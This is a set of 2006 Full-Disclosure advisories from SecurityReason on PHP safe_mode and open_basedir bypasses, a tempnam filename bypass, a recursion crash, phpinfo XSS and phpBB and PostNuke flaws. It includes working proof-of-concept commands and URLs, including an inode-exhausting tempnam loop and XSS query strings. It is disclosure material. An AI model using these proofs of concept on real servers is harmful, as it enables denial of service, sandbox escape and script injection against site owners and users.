"php://../../www/temp/sr.php");' cxib# ls -la /www/temp/sr.php - -rw-r--r-- 1 cxib www 16 Jun 11 17:47 /www/temp/sr.php cxib# - -Example--- - --- 2. Exploit --- ", 3, "php://../../".$file); ?> - --- 3. How to fix --- No response from PHP Team. We have reported this bug in 11.06.2006 - --- 4. Greets --- For: sp3x and p_e_a, l3x, pi3, eax, Infospec, gKPc8O3 - --- 5. Contact --- Author: SecurityReason.Com [ Maksymilian Arciemowicz ( cXIb8O3 ) ] Email: max [at] jestsuper [dot] pl or cxib [at] securityreason [dot] com GPG: http://securityreason.com/key/Arciemowicz.Maksymilian.gpg SecurityReason.Com -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.3 (FreeBSD) iD8DBQFEnwdh3Ke13X/fTO4RAv1eAJ9Gux0j+TtpuvsLMhGRu+b0B86DJQCfR4ps qXoX8VYnwFBa2VmK3zlxpGs= =VAkg -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] tempnam() Bypass unique file name PHP 5.1.4
Source: http://securityreason.com/achievement_securityalert/40 -BEGIN PGP SIGNED MESSAGE- Hash: SHA1 [tempnam() Bypass unique file name PHP 5.1.4] Author: Maksymilian Arciemowicz (cXIb8O3) Date: - -Written: 22.5.2006 - -Public: 11.6.2006 from SECURITYREASON.COM CVE-2006-2660 - --- 0.Description --- PHP is an HTML-embedded scripting language. Much of its syntax is borrowed from C, Java and Perl with a couple of unique PHP-specific features thrown in. The goal of the language is to allow web developers to write dynamically generated pages quickly. A nice introduction to PHP by Stig Sæther Bakken can be found at http://www.zend.com/zend/art/intro.php on the Zend website. Also, much of the PHP Conference Material is freely available. tempnam -- Create file with unique file name. - --- 1. tempnam() Bypass unique file name --- In lastes adv i have public an issue "Open Basedir Bypass". In function tempname() are required 2 arg`s. http://pl.php.net/manual/en/function.tempnam.php string tempnam ( string dir, string prefix ) In PHP 5.1.4 exists bug that allows you to create file with any name. - --- cxib# php -r 'echo tempnam("/www/temp/", "hacker.php")."\n";' /www/temp/hacker.phpGQMqSE - --- You have created file /www/temp/hacker.phpGQMqSE. "GQMqSE" is automatically added to filename. Problem exists, because path couldn't be longer than MAXPATHLEN. In standard MAXPATHLEN is 1024B. - -771-805--- PHP_FUNCTION(tempnam) { zval **arg1, **arg2; char *d; char *opened_path; char *p; int fd; size_t p_len; if (ZEND_NUM_ARGS() != 2 || zend_get_parameters_ex(2, &arg1, &arg2) == FAILURE) { WRONG_PARAM_COUNT; } convert_to_string_ex(arg1); convert_to_string_ex(arg2); if (php_check_open_basedir(Z_STRVAL_PP(arg1) TSRMLS_CC)) { RETURN_FALSE; } d = estrndup(Z_STRVAL_PP(arg1), Z_STRLEN_PP(arg1)); php_basename(Z_STRVAL_PP(arg2), Z_STRLEN_PP(arg2), NULL, 0, &p, &p_len TSRMLS_CC); if (p_len > 64) { p[63] = '\0'; } if ((fd = php_open_temporary_fd(d, p, &opened_path TSRMLS_CC)) >= 0) { close(fd); RETVAL_STRING(opened_path, 0); } else { RETVAL_FALSE; } efree(p); efree(d); } - -771-805--- So if you create path like /www/../www/.. etc. arg1+arg2=1023 uniqueid is not given to path. Example: - --- cxib# php -r 'echo tempnam("/www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../dupa/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../dupa/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/temp/", "hacker.php")."\n";' /www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../dupa/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../dupa/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/temp/hacker.php - --- = /www/temp/hacker.php - --- cxib# ls -la /www/temp/hacker* - -rw--- 1 cxib cxib 0 May 22 23:33 /www/temp/hacker.php - -rw--- 1 cxib cxib 0 May 22 23:26 /www/temp/hacker.phpGQMqSE - --- - --- 2. How to fix --- CVS h
[Full-disclosure] cURL Safe Mode Bypass PHP 4.4.2 and 5.1.4
Source: http://securityreason.com/achievement_securityalert/39 -BEGIN PGP SIGNED MESSAGE- Hash: SHA1 [cURL Safe Mode Bypass PHP 4.4.2 and 5.1.4] Author: Maksymilian Arciemowicz (cXIb8O3) Date: - -Written: 15.5.2006 - -Public: 27.5.2006 from SECURITYREASON.COM CVE-2006-2563 - --- 0.Description --- PHP is an HTML-embedded scripting language. Much of its syntax is borrowed from C, Java and Perl with a couple of unique PHP-specific features thrown in. The goal of the language is to allow web developers to write dynamically generated pages quickly. A nice introduction to PHP by Stig Sather Bakken can be found at http://www.zend.com/zend/art/intro.php on the Zend website. Also, much of the PHP Conference Material is freely available. The PHP safe mode is an attempt to solve the shared-server security problem. It is architecturally incorrect to try to solve this problem at the PHP level, but since the alternatives at the web server and OS levels aren't very realistic, many people, especially ISP's, use safe mode for now. PHP supports libcurl, a library created by Daniel Stenberg, that allows you to connect and communicate to many different types of servers with many different types of protocols. libcurl currently supports the http, https, ftp, gopher, telnet, dict, file, and ldap protocols. libcurl also supports HTTPS certificates, HTTP POST, HTTP PUT, FTP uploading (this can also be done with PHP's ftp extension), HTTP form based upload, proxies, cookies, and user+password authentication. These functions have been added in PHP 4.0.2. - --- 1. Safe Mode Bypass in cURL--- General problem exists in cURL functions, because are changed safe_mode, strings 0 (\x00) are change to "_". Next bug exists in prefix file://, becaluse safe_mode checks only path at file:///. Example: - -Safe_Mode bypass exploit.1--- - -Safe_Mode bypass exploit.1--- Safe_mode checks only access only to __FILE__. But cURL include filethatyoudonthaveaccessto.php. So you can include any files from directory where script is. But in this exploit, you can only read files from directory where is this script. You can't use "/". There is another conception for an exploit: if you have an access to a directory (rights) where you want to read files. So, if you want to include files from "/home/czarnobyl/www/directoryWITHyourRIGHT/fileFROManotherUSER.php", you should make a dir like "/home/czarnobyl/www/directoryWITHyourRIGHT/fileFROManotherUSER.php_/": - -Safe_Mode bypass exploit.2--- - -Safe_Mode bypass exploit.2--- Safe mode checks access to file "file:///home/czarnobyl/www/directoryWITHyourRIGHT/fileFROManotherUSER.php_/../../../../../../YourFile.php" And cURL include only "file:///home/czarnobyl/www/directoryWITHyourRIGHT/fileFROManotherUSER.php" because \x00 are ending path to file. - --- 2. How to fix --- CVS http://cvs.php.net/viewcvs.cgi/php-src/ext/curl/ - --- 3. Greets --- For: sp3x and p_e_a, l5x, Infospec, pi3, eax - --- 4. Contact --- Author: SecurityReason.Com [ Maksymilian Arciemowicz ( cXIb8O3 ) ] Email: max [at] jestsuper [dot] pl or cxib [at] securityreason [dot] com GPG: http://securityreason.com/key/Arciemowicz.Maksymilian.gpg SecurityReason.Com -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.3 (FreeBSD) iD8DBQFEd4bS3Ke13X/fTO4RAsCvAJ9eTxATfJRZZ2/DEoinl4R3Y+DZgACgvHQk v8npsbXGJqmJRiAT9lnCyv8= =mI80 -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] phpBB 2.0.20 Full Path Disclosure and SQL Errors
Source: http://securityreason.com/achievement_securityalert/38 -BEGIN PGP SIGNED MESSAGE- Hash: SHA1 [phpBB 2.0.20 Full Path Disclosure and SQL Errors] Author: Maksymilian Arciemowicz (cXIb8O3) Date: - -Written: 1.5.2006 - -Public: 5.5.2006 from SecurityReason.Com CVE: - - CVE-2006-2219 Full Path Disclosure - - CVE-2006-2220 Sql Errors - --- 0.Description --- phpBB is a high powered, fully scalable, and highly customizable Open Source bulletin board package. phpBB has a user-friendly interface, simple and straightforward administration panel, and helpful FAQ. Based on the powerful PHP server language and your choice of MySQL, MS-SQL, PostgreSQL or Access/ODBC database servers, phpBB is the ideal free community solution for all web sites. Contact with author http://www.phpbb.com/about.php. - --- 1. Full Path Disclosure --- Many scripts, for example phpBB, have a basic bug. It exists in variables, which are being inserted into script, into specific functions. For example function htmlspecialchars() ... if (zend_parse_parameters(ZEND_NUM_ARGS() TSRMLS_CC, "s|ls", &str, &str_len, "e_style, &hint_charset, &hint_charset_len) == FAILURE) { return; } ... As you can see there is a protection from formatting input variable. If the variable is other than string, we have error with Full Path Disclosure. Example: http://[HOST]/2020/phpBB2/memberlist.php?mode[]=cx - ---Code --- if ( isset($HTTP_GET_VARS['mode']) || isset($HTTP_POST_VARS['mode']) ) { $mode = ( isset($HTTP_POST_VARS['mode']) ) ? htmlspecialchars($HTTP_POST_VARS['mode']) : htmlspecialchars($HTTP_GET_VARS['mode']); } else { $mode = 'joined'; } - ---Code --- - ---Result --- Warning: htmlspecialchars() expects parameter 1 to be string, array given in /www/2020/phpBB2/memberlist.php on line 40 Warning: Cannot modify header information - headers already sent by (output started at /www/2020/phpBB2/memberlist.php:40) in /www/2020/phpBB2/includes/page_header.php on line 483 Warning: Cannot modify header information - headers already sent by (output started at /www/2020/phpBB2/memberlist.php:40) in /www/2020/phpBB2/includes/page_header.php on line 485 Warning: Cannot modify header information - headers already sent by (output started at /www/2020/phpBB2/memberlist.php:40) in /www/2020/phpBB2/includes/page_header.php on line 486 - ---Result --- http://[HOST]/2020/phpBB2/viewtopic.php?t=2&highlight[]=cx - ---Result --- Warning: htmlspecialchars() expects parameter 1 to be string, array given in /www/2020/phpBB2/viewtopic.php on line 487 Warning: urlencode() expects parameter 1 to be string, array given in /www/2020/phpBB2/viewtopic.php on line 498 Warning: Cannot modify header information - headers already sent by (output started at /www/2020/phpBB2/viewtopic.php:487) in /www/2020/phpBB2/includes/page_header.php on line 483 Warning: Cannot modify header information - headers already sent by (output started at /www/2020/phpBB2/viewtopic.php:487) in /www/2020/phpBB2/includes/page_header.php on line 485 Warning: Cannot modify header information - headers already sent by (output started at /www/2020/phpBB2/viewtopic.php:487) in /www/2020/phpBB2/includes/page_header.php on line 486 - ---Result --- Problem appears if display_errors==1, but it exists on many websites. (even at php.net). - --- 2. Sql Errors --- Problem appears because we can add everything (INT) to the end of SQL query (LIMIT). The query will fail if the value is below 0 or above -2^32. Example: http://[HOST]/2020/phpBB2/memberlist.php?start=-1 - ---Code --- $start = ( isset($HTTP_GET_VARS['start']) ) ? intval($HTTP_GET_VARS['start']) : 0; - ---Code --- - ---Result --- Could not query users DEBUG MODE SQL Error : 1064 You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '-1, 50' at line 4 SELECT username, user_id, user_viewemail, user_posts, user_regdate, user_from, user_website, user_email, user_icq, user_aim, user_yim, user_msnm, user_avatar, user_avatar_type, user_allowavatar FROM phpbb_users WHERE user_id <> -1 ORDER BY user_regdate ASC LIMIT -1, 50 Line : 151 File : memberlist.php - ---Result --- - --- 3. How to fix --- Turn off display_errors or use function like is_string(). - --- 4. Greets --- sp3x Infospec, p_e_a, krasza, revival, l5x - --- 5. Contact --- Author: SecurityReason.Com [ Maksymilian Arciemowicz ( cXIb8O3 ) ] Email: max [at] jestsuper [dot] pl or cxib [at] securityreason [dot] com GPG: http://securityreason.com/key/Arciemowicz.Maksymilian.gpg SecurityReason.Com -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.2.2 (FreeBSD) iD8DBQFEW4pi3Ke13X/fTO4RAqV7AJ9PeZ9nbRUYATqArEzLOdenG1ypHwCguPa5 7DlqP3M3vq1frb7Zc3y+KrU= =4U6Y -END PGP SIGNATURE- __
[Full-disclosure] copy() Safe Mode Bypass PHP 4.4.2 and 5.1.2
Source: http://securityreason.com/achievement_securityalert/37 -BEGIN PGP SIGNED MESSAGE- Hash: SHA1 [copy() Safe Mode Bypass PHP 4.4.2 and 5.1.2] Author: Maksymilian Arciemowicz (cXIb8O3) Date: - -Written: 2.4.2006 - -Public: 8.4.2006 from SECURITYREASON.COM CVE-2006-1608 - --- 0.Description --- PHP is an HTML-embedded scripting language. Much of its syntax is borrowed from C, Java and Perl with a couple of unique PHP-specific features thrown in. The goal of the language is to allow web developers to write dynamically generated pages quickly. A nice introduction to PHP by Stig Sæther Bakken can be found at http://www.zend.com/zend/art/intro.php on the Zend website. Also, much of the PHP Conference Material is freely available. The PHP safe mode is an attempt to solve the shared-server security problem. It is architecturally incorrect to try to solve this problem at the PHP level, but since the alternatives at the web server and OS levels aren't very realistic, many people, especially ISP's, use safe mode for now. - --- 1. Safe Mode Bypass --- General problem exists in safe mode function, because safe mode accept path like "compress.zlib://". PHP442 File "main/safe_mode.c" - -78-80--- wrapper = php_stream_locate_url_wrapper(filename, NULL, STREAM_LOCATE_WRAPPERS_ONLY TSRMLS_CC); if (wrapper != NULL) return 1; - -78-80--- if php_stream_locate_url_wrapper() return something.. safe mode is going to stop. Let`s see the function php_stream_locate_url_wrapper(). PHP442 File "main/streams.c" - -2522-2588--- PHPAPI php_stream_wrapper *php_stream_locate_url_wrapper(const char *path, char **path_for_open, int options TSRMLS_DC) { HashTable *wrapper_hash = (FG(stream_wrappers) ? FG(stream_wrappers) : &url_stream_wrappers_hash); php_stream_wrapper *wrapper = NULL; const char *p, *protocol = NULL; int n = 0; if (path_for_open) *path_for_open = (char*)path; if (options & IGNORE_URL) return (options & STREAM_LOCATE_WRAPPERS_ONLY) ? NULL : &php_plain_files_wrapper; for (p = path; isalnum((int)*p) || *p == '+' || *p == '-' || *p == '.'; p++) { n++; } if ((*p == ':') && (n > 1) && !strncmp("://", p, 3)) { protocol = path; } else if (strncasecmp(path, "zlib:", 5) == 0) { /* BC with older php scripts and zlib wrapper */ protocol = "compress.zlib"; n = 13; if (options & REPORT_ERRORS) { php_error_docref(NULL TSRMLS_CC, E_WARNING, "Use of \"zlib:\" wrapper is deprecated; please use \"compress.zlib://\" instead."); } } if (protocol) { if (FAILURE == zend_hash_find(wrapper_hash, (char*)protocol, n, (void**)&wrapper)) { char wrapper_name[32]; if (options & REPORT_ERRORS) { if (n >= sizeof(wrapper_name)) n = sizeof(wrapper_name) - 1; PHP_STRLCPY(wrapper_name, protocol, sizeof(wrapper_name), n); php_error_docref(NULL TSRMLS_CC, E_NOTICE, "Unable to find the wrapper \"%s\" - did you forget to enable it when you configured PHP?", wrapper_name); } wrapper = NULL; protocol = NULL; } } /* TODO: curl based streams probably support file:// properly */ if (!protocol || !strncasecmp(protocol, "file", n)) { if (protocol && path[n+1] == '/' && path[n+2] == '/') { if (options & REPORT_ERRORS) php_error_docref(NULL TSRMLS_CC, E_WARNING, "remote host file access not supported, %s", path); return NULL; } if (protocol && path_for_open) *path_for_open = (char*)path + n + 1; /* fall back on regular file access */ return (options & STREAM_LOCATE_WRAPPERS_ONLY) ? NULL : &php_plain_files_wrapper; } if (wrapper && wrapper->is_url && !PG(allow_url_fopen)) { if (options & REPORT_ERRORS) php_error_docref(NULL TSRMLS_CC, E_WARNING, "URL file-access is disabled in the server configuration"); return NULL; }
[Full-disclosure] tempnam() open_basedir bypass PHP 4.4.2 and 5.1.2
Source: http://securityreason.com/achievement_securityalert/36 -BEGIN PGP SIGNED MESSAGE- Hash: SHA1 [tempnam() open_basedir bypass PHP 4.4.2 and 5.1.2] Author: Maksymilian Arciemowicz (cXIb8O3) Date: - -Written: 26.3.2006 - -Public: 8.4.2006 from SECURITYREASON.COM CVE-2006-1494 - --- 0.Description --- PHP is an HTML-embedded scripting language. Much of its syntax is borrowed from C, Java and Perl with a couple of unique PHP-specific features thrown in. The goal of the language is to allow web developers to write dynamically generated pages quickly. A nice introduction to PHP by Stig Sæther Bakken can be found at http://www.zend.com/zend/art/intro.php on the Zend website. Also, much of the PHP Conference Material is freely available. tempnam -- Create file with unique file name - --- 1. tempnam() open_basedir bypass --- In function tempname() are required 2 arg`s. http://pl.php.net/manual/en/function.tempnam.php string tempnam ( string dir, string prefix ) So, if we have open_basedir set to /home, we can't create file over /home directory. In ext/standard/file.c (PHP 4.4.2) - -550-578--- PHP_FUNCTION(tempnam) { pval **arg1, **arg2; char *d; char *opened_path; char p[64]; FILE *fp; if (ZEND_NUM_ARGS() != 2 || zend_get_parameters_ex(2, &arg1, &arg2) == FAILURE) { WRONG_PARAM_COUNT; } convert_to_string_ex(arg1); convert_to_string_ex(arg2); if (php_check_open_basedir(Z_STRVAL_PP(arg1) TSRMLS_CC)) { RETURN_FALSE; } d = estrndup(Z_STRVAL_PP(arg1), Z_STRLEN_PP(arg1)); strlcpy(p, Z_STRVAL_PP(arg2), sizeof(p)); if ((fp = php_open_temporary_file(d, p, &opened_path TSRMLS_CC))) { fclose(fp); RETVAL_STRING(opened_path, 0); } else { RETVAL_FALSE; } efree(d); } - -550-578--- if (php_check_open_basedir(Z_STRVAL_PP(arg1) TSRMLS_CC)) { RETURN_FALSE; } Where is arg2? So we can write exploit like: tempnam("path_from_open_basedir", "../../../../../../../../Open_basedir_bypasswd"); tempnam("/home", "../../../../../../tmp/cx"); etc. It is low issue but you can try create a lot of files and overload inodes from HD.I have one particion. /var /dev/ad0s1e1.0G 97M858M10%/var <- Space (B) /dev/ad0s1e 101297494472 83746610%3796 1375143% /var <- INODES where mysql and apache try create some file. WWhen we overload free inodes, system have big problem with apache, mysql. Example: cxib# php -r 'function cx(){ tempnam("/www/", "../../../../../../var/tmp/cx"); cx(); } cx();' /var: create/symlink failed, no inodes free /var: create/symlink failed, no inodes free /var: create/symlink failed, no inodes free /var: create/symlink failed, no inodes free ... etc /usr/local/libexec/mysqld: Can't create/write to file '/var/tmp/ibBIsZ6o' (Errcode: 13) And mysql die()! - --- 2. How to fix --- CVS http://cvs.php.net/viewcvs.cgi/php-src/NEWS - --- 3. Greets --- For: sp3x and p_e_a, pi3, eax, Infospec ;] - --- 4. Contact --- Author: SecurityReason.Com [ Maksymilian Arciemowicz ( cXIb8O3 ) ] Email: max [at] jestsuper [dot] pl or cxib [at] securityreason [dot] com GPG: http://securityreason.com/key/Arciemowicz.Maksymilian.gpg SecurityReason.Com -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.2.2 (FreeBSD) iD8DBQFEOAZB3Ke13X/fTO4RAiDmAKCbBZP8JBC0F/9cB5OgUFJPgqHB4QCgon9L kBEMIExP2TZ0+NP7l5uk9TE= =f3i4 -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] function *() php/apache Crash PHP 4.4.2 and 5.1.2
Source: http://securityreason.com/achievement_securityalert/35 -BEGIN PGP SIGNED MESSAGE- Hash: SHA1 [function *() php/apache Crash PHP 4.4.2 and 5.1.2] Author: Maksymilian Arciemowicz (cXIb8O3) Date: - -Written: 21.3.2006 - -Public: 8.4.2006 from SECURITYREASON.COM CVE-2006-1549 - --- 0.Description --- PHP is an HTML-embedded scripting language. Much of its syntax is borrowed from C, Java and Perl with a couple of unique PHP-specific features thrown in. The goal of the language is to allow web developers to write dynamically generated pages quickly. A nice introduction to PHP by Stig Sæther Bakken can be found at http://www.zend.com/zend/art/intro.php on the Zend website. Also, much of the PHP Conference Material is freely available. - --- 1. function *() Crash --- PHP4/5 is vulnerability to a local denial-of-service. General problem is in allocated data to memory. for example attack: cxib# php -r 'function cx(){ cx(); } cx();' Segmentation fault (core dumped) cxib# Segfault.. let`s see what we have in gdb - --- cxib# cat /www/functionsegfault.php cxib# gdb -q php (gdb) r '/www/functionsegfault.php' Starting program: /usr/local/bin/php '/www/functionsegfault.php' Program received signal SIGSEGV, Segmentation fault. 0x080de6bd in _zval_copy_ctor (zvalue=0xbbc00260, __zend_filename=0x811d8c0 "/usr/ports/lang/php4/work/php-4.4.2/Zend/zend_execute.c", __zend_lineno=1568) at /usr/ports/lang/php4/work/php-4.4.2/Zend/zend_variables.c:111 111 /usr/ports/lang/php4/work/php-4.4.2/Zend/zend_variables.c: No such file or directory. in /usr/ports/lang/php4/work/php-4.4.2/Zend/zend_variables.c (gdb) bt #0 0x080de6bd in _zval_copy_ctor (zvalue=0xbbc00260, __zend_filename=0x811d8c0 "/usr/ports/lang/php4/work/php-4.4.2/Zend/zend_execute.c", __zend_lineno=1568) at /usr/ports/lang/php4/work/php-4.4.2/Zend/zend_variables.c:111 #1 0x080f042a in execute (op_array=0x81b3880) at /usr/ports/lang/php4/work/php-4.4.2/Zend/zend_execute.c:1568 #2 0x080f019a in execute (op_array=0x81b3880) at /usr/ports/lang/php4/work/php-4.4.2/Zend/zend_execute.c:1719 #3 0x080f019a in execute (op_array=0x81b3880) at /usr/ports/lang/php4/work/php-4.4.2/Zend/zend_execute.c:1719 #4 0x080f019a in execute (op_array=0x81b3880) at /usr/ports/lang/php4/work/php-4.4.2/Zend/zend_execute.c:1719 #5 0x080f019a in execute (op_array=0x81b3880) ... - --- or in apache error_log [Mon Mar 20 12:12:54 2006] [notice] child pid 744 exit signal Illegal instruction (4) - --- 2. Greets --- For: sp3x and p_e_a, pi3, eax, Infospec ;] - --- 3. Contact --- Author: SecurityReason.Com [ Maksymilian Arciemowicz ( cXIb8O3 ) ] Email: max [at] jestsuper [dot] pl or cxib [at] securityreason [dot] com GPG: http://securityreason.com/key/Arciemowicz.Maksymilian.gpg SecurityReason.Com -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.2.2 (FreeBSD) iD8DBQFEOAT43Ke13X/fTO4RAiFnAKC+vzJm1w24b4VN9CMdhE6e6a2L4QCePbp7 lNzhZke21IHXM0TvvjntXyY= =Y7Ft -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] phpinfo() Cross Site Scripting PHP 5.1.2 and 4.4.2
Source: http://securityreason.com/achievement_securityalert/34 -BEGIN PGP SIGNED MESSAGE- Hash: SHA1 [phpinfo() Cross Site Scripting PHP 5.1.2 and 4.4.2] Author: Maksymilian Arciemowicz (cXIb8O3) Date: - -Written: 26.2.2006 - -Public: 8.4.2006 from SecurityReason.Com CVE-2006-0996 - --- 0.Description --- PHP is an HTML-embedded scripting language. Much of its syntax is borrowed from C, Java and Perl with a couple of unique PHP-specific features thrown in. The goal of the language is to allow web developers to write dynamically generated pages quickly. A nice introduction to PHP by Stig Sæther Bakken can be found at http://www.zend.com/zend/art/intro.php on the Zend website. Also, much of the PHP Conference Material is freely available. - --- 1. Cross Site Scripting --- In phpinfo() you can see all Varibles like: file: standard/info.c - -630-636--- php_print_gpcse_array("_REQUEST", sizeof("_REQUEST")-1 TSRMLS_CC); php_print_gpcse_array("_GET", sizeof("_GET")-1 TSRMLS_CC); php_print_gpcse_array("_POST", sizeof("_POST")-1 TSRMLS_CC); php_print_gpcse_array("_FILES", sizeof("_FILES")-1 TSRMLS_CC); php_print_gpcse_array("_COOKIE", sizeof("_COOKIE")-1 TSRMLS_CC); php_print_gpcse_array("_SERVER", sizeof("_SERVER")-1 TSRMLS_CC); php_print_gpcse_array("_ENV", sizeof("_ENV")-1 TSRMLS_CC); - -630-636--- Function php_print_gpcse_array() for any arrays check 4096b of varible. file: standard/info.c - -135-154--- if (Z_TYPE_PP(tmp) == IS_ARRAY) { zval *tmp3; MAKE_STD_ZVAL(tmp3); if (!sapi_module.phpinfo_as_text) { PUTS(""); } php_start_ob_buffer(NULL, 4096, 1 TSRMLS_CC); zend_print_zval_r(*tmp, 0); php_ob_get_buffer(tmp3 TSRMLS_CC); php_end_ob_buffer(0, 0 TSRMLS_CC); elem_esc = php_info_html_esc(Z_STRVAL_P(tmp3) TSRMLS_CC); PUTS(elem_esc); efree(elem_esc); zval_ptr_dtor(&tmp3); if (!sapi_module.phpinfo_as_text) { PUTS(""); } } else if (Z_TYPE_PP(tmp) != IS_STRING) { - -135-154--- So if we create array longer like 4096, html tags don't be remove. Exploit: If in php script is function phpinfo() try create some varibles (array) like phpinfo.php?cx[][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][] [][][][][]=[XSS] or phpinfo.php?cx[]=c..~4096chars...ccc[XSS] - --- 2. How to fix --- CVS http://cvs.php.net/viewcvs.cgi/php-src/NEWS - --- 3. Greets --- For: sp3x and p_e_a, pi3, eax ;] - --- 4. Contact --- Author: SecurityReason.Com [ Maksymilian Arciemowicz ( cXIb8O3 ) ] Email: max [at] jestsuper [dot] pl or cxib [at] securityreason [dot] com GPG: http://securityreason.com/key/Arciemowicz.Maksymilian.gpg SecurityReason.Com -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.2.2 (FreeBSD) iD8DBQFEOAIl3Ke13X/fTO4RAo4LAJ0fBxJWN64vWrDYJEuhGkqc/OC42QCbBxip f35+6LHjuBoqP5D2JV84ufs= =iz3m -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Re: Mis-diagnosed XSS bugs hiding worse issues due to PHP feature
On Saturday 01 April 2006 10:11, Steven M. Christey wrote: We have reported this xss (in php display_errors) 28 May 2005. http://bugs.php.net/bug.php?id=33173&edit=1 Replay from php developers : "Bogus". "...Show erros is only a convenience thing to aid you while developing. Thus no user will ever see such error messages. So in the end it is not usable for phishing and alike..." Many functions in php are vulnerability of xss. It is no dangerous but can't exists. For example http://securityreason.com/achievement_securityalert/18 or gpg version: http://securityreason.com/achievement_securityalert/18/1 function include() in postnuke. > In a post-disclosure analysis [1] of a security issue announced by > rgod [2], Siegfried observed that the reported XSS actually originated > from a file inclusion vulnerability, in which the XSS was reflected > > back from an error message when the file inclusion failed: > >About the xss, it is an xss in the php error message, there are many > >php functions returning errors without filtering them, anybody noted > >that? > > Yes. > > I would greatly appreciate some corroboration from the real PHP/web > security experts out there on what I'm about to say. If true, it > would partly explain why XSS is so rampant in PHP applications. > > As I understand it, this behavior is due to an XSS problem in PHP > itself before 5.1.2 (CVE-2006-0208), as announced in January 2006: > > http://www.php.net/release_5_1_2.php > > It's not clear if PHP 4.x was affected. > > The XSS happens when display_errors and html_errors are enabled - it > won't quote the output from raw error messages. > > No doubt many so-called XSS errors these days are the result of this > particular issue in PHP. They're aren't entirely the application's > fault, although obviously they indicate the lack of strong input > validation. > > This can hide much more serious vulnerabilities, like file inclusion, > directory traversal, or SQL injection. I have mentioned this in the > past, but now we know why this seems to happen so often. > (Application-controlled error handlers can still be subject to XSS of > course, even under a fixed PHP.) > > For those who do post-disclosure analysis: there *might* be a > resultant XSS issue if the researcher claims both XSS and another type > of bug in the same affected parameter/component, or if the > researcher's report includes error messages that don't seem to be > sanitizing XSS-tainted output. > > - Steve > > [1] > http://lists.grok.org.uk/pipermail/full-disclosure/2006-March/044756.html > > [2] http://retrogod.altervista.org/claroline_174_incl_xpl.html SecurityReason.Com Europe -- pub 1024D/7FDF4CEE 2005-09-21 uid Maksymilian Arciemowicz (cXIb8O3) <[EMAIL PROTECTED]> sub 2048g/AE816DB6 2005-09-21 ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Multiple vulnerabilities in PostNuke <= 0.761
Source: http://securityreason.com/achievement_securityalert/33 -BEGIN PGP SIGNED MESSAGE- Hash: SHA1 [Multiple vulnerabilities in PostNuke <= 0.761] SecurityAlert SA033 Author: Maksymilian Arciemowicz (cXIb8O3) Date: 19.2.2006 from SecurityReason.Com - --- 0.Description --- PostNuke: The Phoenix Release (0.761) PostNuke is an open source, open developement content management system (CMS). PostNuke started as a fork from PHPNuke (http://www.phpnuke.org) and provides many enhancements and improvements over the PHP-Nuke system. PostNuke is still undergoing development but a large number of core functions are now stabilising and a complete API for third-party developers is now in place. If you would like to help develop this software, please visit our homepage at http://noc.postnuke.com/ You can also visit us on our IRC Server irc.postnuke.com channel #postnuke-support #postnuke-chat #postnuke Or at the Community Forums located at: http://forums.postnuke.com/ - --- 1. Bypass pnVarCleanFromInput() and pnAntiCracker --- In PostNuke is function pnVarCleanFromInput() (file includes/pnAPI.php). - -419-515--- function pnVarCleanFromInput() { // Create an array of bad objects to clean out of input variables $search = array('||si', '||si', '||si', '||si', '||si', '||si', '||si', '|STYLE\s*=\s*"[^"]*"|si'); // Create an empty array that will be used to replace any malacious code $replace = array(''); ... - -419-515--- and function pnSecureInput() (file includes/pnAntiCracker.php). - -31-109--- function pnSecureInput() { // Cross-Site Scripting attack defense - Sent by larsneo // some syntax checking against injected javascript // extended by Neo if (count($_GET) > 0) { 